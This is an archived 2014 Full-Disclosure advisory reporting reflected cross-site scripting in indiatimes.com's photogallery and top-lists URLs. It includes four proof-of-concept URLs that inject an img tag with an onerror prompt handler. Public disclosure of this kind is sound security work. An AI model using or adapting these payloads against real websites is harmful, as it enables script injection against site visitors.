lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 26 Nov 2014 13:00:22 +0800
From: Jing Wang <justqdjing@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] All Links in Two Topics of Indiatimes (indiatimes.com) Are
 Vulnerable to XSS (cross site scripting) Attacks

*All Links in **Two Topics of Indiatimes (indiatimes.com
<http://indiatimes.com/>) Are Vulnerable to XSS (cross site scripting)
Attacks *




*Domain Description:*

http://www.indiatimes.com


"According to the Indian Readership Survey (IRS) 2012, the Times of India
is the most widely read English newspaper in India with a readership of
7.643 million. This ranks the Times of India as the top English daily in
India by readership." (en.Wikipedia.org <http://en.wikipedia.org/>)







*Vulnerability description:*


The vulnerability occurs at Indiatimes's URL links. Indiatimes only filter
part of the filenames in its website. All URLs under Indiatimes's
"photogallery" and "top-llists" topics are affected.


Indiatimes uses part of the links under "photogallery" and "top-llists"
topics to construct its website content without any checking of those links
at all. This mistake is very popular in nowaday websites. Developer is not
security expert.



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes:*

http://www.indiatimes.com/photogallery/"><img src=x
onerror=prompt('justqdjing')>

http://www.indiatimes.com/top-lists/"><img src=x
onerror=prompt('justqdjing')>

http://www.indiatimes.com/photogallery/lifestyle/"><img src=x
onerror=prompt('justqdjing')>

http://www.indiatimes.com/top-lists/technology/"><img src=x
onerror=prompt('justqdjing')>





*POC Video:*

https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html






The vulnerabilities were reported to Indiatimes in early September, 2014.
However they are still unpatched.









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists